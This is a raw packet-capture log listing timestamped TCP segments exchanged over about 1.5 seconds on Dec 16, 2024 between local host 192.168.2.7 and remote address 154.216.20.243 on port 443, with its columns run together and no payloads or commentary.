                                                                                                                                Dec 16, 2024 13:41:03.337380886 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.351150036 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.351200104 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.351249933 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.351284027 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.351304054 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.351464033 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.432348013 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.432365894 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.432470083 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.432511091 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.432533026 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.432640076 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.436876059 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.436943054 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.436964035 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.436988115 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.437006950 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.437028885 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.512814999 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.512871027 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.512907982 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.512948036 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.512967110 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.512996912 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.516622066 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.516657114 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.516717911 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.516740084 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.516760111 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.516779900 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.521038055 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.521066904 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.521120071 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.521138906 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.521159887 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.521177053 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.525051117 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.525075912 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.525132895 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.525156021 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.525171995 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.525255919 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.529038906 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.529084921 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.529130936 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.529148102 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.529165030 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.529201984 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.540947914 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.540996075 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.541043997 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.541058064 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.541090012 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.541105986 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.623778105 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.623802900 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.623904943 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.623979092 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.624053955 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.627664089 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.627682924 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.627787113 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.627808094 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.627861977 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.704504967 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.704515934 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.704683065 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.704765081 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.704847097 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.709044933 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.709064960 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.709148884 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.709166050 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.709224939 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.712805986 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.712821960 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.712898970 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.712914944 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.712975025 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.717443943 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.717461109 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.717541933 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.717557907 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.717614889 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.721440077 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.721457958 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.721529007 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.721550941 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.721579075 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.721646070 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.732981920 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.732999086 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.733079910 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.733098984 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.733150959 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.816199064 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.816224098 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.816307068 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.816380978 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.816447973 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.819808006 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.819827080 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.819895029 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.819936991 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.819992065 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.896697044 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.896717072 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.896805048 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.896843910 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.896895885 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.900599957 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.900615931 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.900672913 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.900681019 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.900719881 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.905227900 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.905245066 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.905316114 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.905349970 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.905440092 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.909203053 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.909219980 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.909281015 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.909297943 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.909337044 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.914050102 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.914064884 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.914129972 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.914161921 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.914243937 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.925199986 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.925215006 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.925293922 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:03.925338984 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:03.925404072 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.008109093 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.008128881 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.008197069 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.008238077 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.008285999 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.011948109 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.011964083 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.012027025 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.012041092 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.012089014 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.088977098 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.089004040 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.089061975 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.089102030 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.089121103 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.089145899 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.093252897 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.093278885 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.093329906 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.093346119 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.096836090 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.097336054 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.097357988 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.097418070 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.097428083 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.097469091 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.101227045 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.101246119 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.101308107 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.101320028 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.101360083 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.105961084 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.105982065 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.106051922 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.106067896 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.106107950 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.117394924 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.117424011 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.117469072 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.117490053 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.117506981 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.119297028 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.200232029 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.200263023 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.200476885 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.200504065 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.200555086 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.205092907 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.205111980 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.205171108 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.205183029 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.205224037 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.281332970 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.281356096 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.281598091 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.281667948 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.281728029 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.284799099 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.284816027 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.284887075 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.284903049 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.284960985 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.289522886 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.289540052 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.289612055 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.289627075 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.289680958 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.293380976 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.293397903 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.293502092 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.293517113 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.293626070 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.298260927 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.298280001 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.298376083 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.298391104 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.298446894 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.309750080 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.309772015 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.310019970 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.310045004 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.310190916 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.393085003 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.393109083 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.393215895 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.393256903 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.396776915 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.396806002 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.396878004 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.396888971 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.396933079 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.396970034 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.473030090 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.473052979 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.473189116 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.473223925 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.473295927 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.477324963 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.477343082 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.477423906 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.477432966 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.477473021 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.481987953 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.482004881 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.482078075 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.482085943 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.482132912 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.485795975 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.485811949 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.485893011 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.485901117 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.485966921 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.489584923 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.489599943 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.489664078 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.489671946 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.489712000 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.501580000 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.501595974 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.501672983 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.501682043 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.501724958 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.585211992 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.585235119 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.585338116 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.585359097 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.585376978 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.585401058 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.588900089 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.588915110 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.589003086 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.589010954 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.589057922 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.665370941 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.665395021 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.665555954 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.665570974 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.665641069 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.669068098 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.669083118 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.669154882 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.669162989 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.669209957 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.673686028 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.673705101 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.673789024 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.673795938 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.673842907 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.677705050 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.677722931 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.677814007 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.677820921 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.677860975 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.682537079 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.682553053 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.682636023 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.682643890 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.682683945 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.695117950 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.695135117 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.695272923 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.695280075 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.695324898 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.779870987 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.779894114 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.779958963 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.779970884 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.780004025 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.780020952 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.782149076 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.782165051 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.782215118 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.782223940 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.782262087 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:04.859903097 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:04.859931946 CET44349700154.216.20.243192.168.2.7
